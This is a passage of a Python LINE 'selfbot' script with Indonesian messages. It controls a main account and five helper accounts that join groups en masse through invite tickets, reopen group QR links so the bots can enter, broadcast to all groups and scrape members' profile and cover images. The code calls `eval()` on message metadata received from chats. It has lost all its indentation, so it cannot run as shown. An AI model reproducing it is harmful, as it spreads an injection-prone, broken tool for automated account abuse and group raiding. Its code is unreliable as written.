else: md+="「✭」 Jointicket「OFF」\n"
if msg.to in welcome: md+="「✭」 Welcome「ON」\n"
else: md+="「✭」 Welcome「OFF」\n"
if wait["autoLeave"] == True: md+="「✭」 Autoleave「ON」\n"
else: md+="「✭」 Autoleave「OFF」\n"
if msg.to in protectqr: md+="「✭」 Protecturl「ON」\n"
else: md+="「✭」 Protecturl「OFF」\n"
if msg.to in protectjoin: md+="「✭」 Protectjoin「ON」\n"
else: md+="「✭」 Protectjoin「OFF」\n"
if msg.to in protectkick: md+="「✭」 Protectkick「ON」\n"
else: md+="「✭」 Protectkick「OFF」\n"
if msg.to in protectinvite: md+="「✭」 Protectinvite「ON」\n"
else: md+="「✭」 Protectinvite「OFF」\n"
if msg.to in protectcancel: md+="「✭」 Protectcancel「ON」\n"
else: md+="「✭」 Protectcancel「OFF」\n"
if msg.to in protectantijs: md+="=Antijs [ON]\n"
else: md+="=Antijs [OFF]\n"
if msg.to in ghost: md+="=Ghost [ON]\n"
else: md+="=Ghost [OFF]\n"
ginfo = cl.getGroup(msg.to)
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Selfbot Settings 」\n• User : "
ret_ = "• Group : {}\n".format(str(ginfo.name))
ret_ += str(md)
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + "\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"「Created by : Oz.♋️ 」")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd.startswith('about'):
if wait["selfbot"] == True:
if msg._from in admin:
try:
arr = []
today = datetime.today()
thn = 2025
bln = 12 #isi bulannya yg sewa
hr = 11 #isi tanggalnya yg sewa
future = datetime(thn, bln, hr)
days = (str(future - today))
comma = days.find(",")
days = days[:comma]
contact = cl.getContact(mid)
favoritelist = cl.getFavoriteMids()
grouplist = cl.getGroupIdsJoined()
contactlist = cl.getAllContactIds()
blockedlist = cl.getBlockedContactIds()
eltime = time.time() - mulai
bot = runtime(eltime)
start = time.time()
sw.sendText("ue6d8f9ef8f820fad9c65bbb5d1ec714b", '.')
elapsed_time = time.time() - start
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Informasi Selfbot 」\n• User : "
ret_ = "• Group : {} Group".format(str(len(grouplist)))
ret_ += "\n• Friend : {} Friend".format(str(len(contactlist)))
ret_ += "\n• Blocked : {} Blocked".format(str(len(blockedlist)))
ret_ += "\n• Favorite : {} Favorite".format(str(len(favoritelist)))
ret_ += "\n• Version : 「Self Bots 」"
ret_ += "\n• Expired : {} - {} - {}".format(str(hr), str(bln), str(thn))
ret_ += "\n• In days : {} again".format(days)
ret_ += "\n「 Speed Respon 」\n• {} detik".format(str(elapsed_time))
ret_ += "\n「 Selfbot Runtime 」\n• {}".format(str(bot))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
cl.sendContact(to, "ue6d8f9ef8f820fad9c65bbb5d1ec714b")
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 User Selfbot 」\n", "")
cl.sendContact(msg.to,sender)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif cmd.startswith("mid "):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Steal " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
a = channel.getProfileCoverURL(mid=key1)
cl.sendMessage(msg.to, "「 Contact Info 」\n• Nama : "+str(mi.displayName)+"\n• Mid : " +key1+"\n• Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
cl.sendImageWithURL(receiver, a)
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
cl.sendImageWithURL(receiver, a)
elif ("Cover " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
try:
key = eval(msg.contentMetadata["MENTION"])
u = key["MENTIONEES"][0]["M"]
a = channel.getProfileCoverURL(mid=u)
cl.sendImageWithURL(receiver, a)
except Exception as e:
cl.sendText(receiver, str(e))
elif ("Sticker: " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
try:
query = msg.text.replace("Sticker: ", "")
query = int(query)
if type(query) == int:
cl.sendImageWithURL(receiver, 'https://stickershop.line-scdn.net/stickershop/v1/product/'+str(query)+'/ANDROID/main.png')
cl.sendText(receiver, 'https://line.me/S/sticker/'+str(query))
else:
cl.sendText(receiver, 'gunakan key sticker angka bukan huruf')
except Exception as e:
cl.sendText(receiver, str(e))
elif "/ti/g/" in msg.text.lower():
if msg._from in admin:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group4 = km.findGroupByTicket(ticket_id)
km.acceptGroupInvitationByTicket(group4.id,ticket_id)
km.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group5 = kb.findGroupByTicket(ticket_id)
kb.acceptGroupInvitationByTicket(group5.id,ticket_id)
kb.sendMessage(msg.to, "Masuk : %s" % str(group.name))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
elif cmd == "reject":
if wait["selfbot"] == True:
if msg._from in admin:
ginvited = cl.getGroupIdsInvited()
if ginvited != [] and ginvited != None:
for gid in ginvited:
cl.rejectGroupInvitation(gid)
cl.sendMessage(to, "Berhasil tolak sebanyak {} undangan grup".format(str(len(ginvited))))
else:
cl.sendMessage(to, "Tidak ada undangan yang tertunda")
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
km.removeAllMessages(op.param2)
kb.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if msg._from in admin:
sep = text.split(" ")
bc = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Broadcast 」\nBroadcast by "
ret_ = "{}".format(str(bc))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(group, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "「 Status Setkey 」\nSetkey saat ini「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "「 Change Setkey 」\nSetkey diganti jadi「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "「 Resetkey 」\nSetkey mu telah direset")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Restarting 」\nUser ", "\nTunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = runtime(eltime)
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Runtime 」\n• User Self : "
ret_ = "• {}".format(str(bot))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
cl.sendMessage(msg.to, "「 Group Info 」\n「✭」 Nama Group : {}".format(G.name)+ "\n「✭」 ID Group : {}".format(G.id)+ "\n「✭」 Pembuat : {}".format(G.creator.displayName)+ "\n「✭」 Waktu Dibuat : {}".format(str(timeCreated))+ "\n「✭」 Jumlah Member : {}".format(str(len(G.members)))+ "\n「✭」 Jumlah Pending : {}".format(gPending)+ "\n「✭」 Group Qr : {}".format(gQr)+ "\n「✭」 Group Ticket : {}".format(gTicket))
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += "「 Group Info 」"
ret_ += "\n「✭」 Nama Group : {}".format(G.name)
ret_ += "\n「✭」 ID Group : {}".format(G.id)
ret_ += "\n「✭」 Pembuat : {}".format(gCreator)
ret_ += "\n「✭」 Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n「✭」 Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n「✭」 Jumlah Pending : {}".format(gPending)
ret_ += "\n「✭」 Group Qr : {}".format(gQr)
ret_ += "\n「✭」 Group Ticket : {}".format(gTicket)
ret_ += "\n「✭」 Picture Url : http://dl.profile.line-cdn.net/{}".format(G.pictureStatus)
ret_ += ""
cl.sendMessage(to, str(ret_))
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except:
pass
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = cl.getGroup(msg.to)
cl.inviteIntoGroup(msg.to, [Zmid])
cl.sendMessage(msg.to,"Grup ["+str(ginfo.name)+"] Aman Dari JS")
except:
pass
elif cmd.startswith("joinall "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(group)
cl.acceptGroupInvitationByTicket(group,Ticket)
ki.acceptGroupInvitationByTicket(group,Ticket)
kk.acceptGroupInvitationByTicket(group,Ticket)
kc.acceptGroupInvitationByTicket(group,Ticket)
km.acceptGroupInvitationByTicket(group,Ticket)
kb.acceptGroupInvitationByTicket(group,Ticket)
G.preventedJoinByTicket = True
cl.updateGroup(G)
try:
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Masuk Group 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("leavegrup "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
ginfo = cl.getGroup(group)
gCreator = ginfo.creator.mid
recky = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「Maaf Di Paksa Keluar」 '
reck = str(recky.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':recky.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan+zxc + "「Next Mapir Lagi」"
ki.sendMessage(group, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
ki.sendImageWithURL(group,"http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=u48c350911cde6604da051d9da06c5db7&oid=faadb1b4f3991376bdccbd5700545da6")
ki.leaveGroup(group)
kk.leaveGroup(group)
kc.leaveGroup(group)
km.leaveGroup(group)
kb.leaveGroup(group)
except:
cl.sendMessage(msg.to, "Grup itu tidak ada")
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ginfo = cl.getGroup(group)
gCreator = ginfo.creator.mid
reck = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Leave Group 」\n• Creator : '
recky = str(reck.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':reck.mid}
zx2.append(zx)
zxc += pesan2
ret_ += xpesan +zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Jumlah Member : {}".format(str(len(G.members)))
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as e:
cl.sendMessage(to, str(e))
elif cmd.startswith("leaveall "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
ki.sendText(group,"Next see you Againt")
ki.leaveGroup(group)
kk.leaveGroup(group)
kc.leaveGroup(group)
km.leaveGroup(group)
kb.leaveGroup(group)
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Leave Group 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
cl.sendText(msg.to, "Grup itu tidak ada")
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Jumlah Member : {}".format(str(len(G.members)))
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as e:
cl.sendMessage(to, str(e))
elif cmd.startswith("k1gurl "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = ki.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = ki.getGroup(group)
G.preventedJoinByTicket = False
ki.updateGroup(G)
invsend = 0
Ticket = ki.reissueGroupTicket(group)
cl.acceptGroupInvitationByTicket(group,Ticket)
ki.acceptGroupInvitationByTicket(group,Ticket)
kk.acceptGroupInvitationByTicket(group,Ticket)
kc.acceptGroupInvitationByTicket(group,Ticket)
km.acceptGroupInvitationByTicket(group,Ticket)
kb.acceptGroupInvitationByTicket(group,Ticket)
G.preventedJoinByTicket = True
ki.updateGroup(G)
try:
gCreator = G.creator.mid
dia = ki.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(ki.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "\n• Nama : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
ki.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("open "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
G.preventedJoinByTicket = False
cl.updateGroup(G)
try:
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Open Qr 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("close "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
G.preventedJoinByTicket = True
cl.updateGroup(G)
try:
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Close Qr 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "「✭」 "+ str(no) + ". " + mem.displayName
cl.sendMessage(to,"「✭」 Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("protectqr|on "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
protectqr[G] = True
f=codecs.open('protectqr.json','w','utf-8')
json.dump(protectqr, f, sort_keys=True, indent=4,ensure_ascii=False)
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Protect Qr Diaktifkan 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
cl.sendText(msg.to, "Grup itu tidak ada")
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Jumlah Member : {}".format(str(len(G.members)))
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as e:
cl.sendMessage(to, str(e))
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist4":
if msg._from in admin:
ma = ""
a = 0
gid = km.getGroupIdsJoined()
for i in gid:
G = km.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
km.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist5":
if msg._from in admin:
ma = ""
a = 0
gid = kb.getGroupIdsJoined()
for i in gid:
G = kb.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kb.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
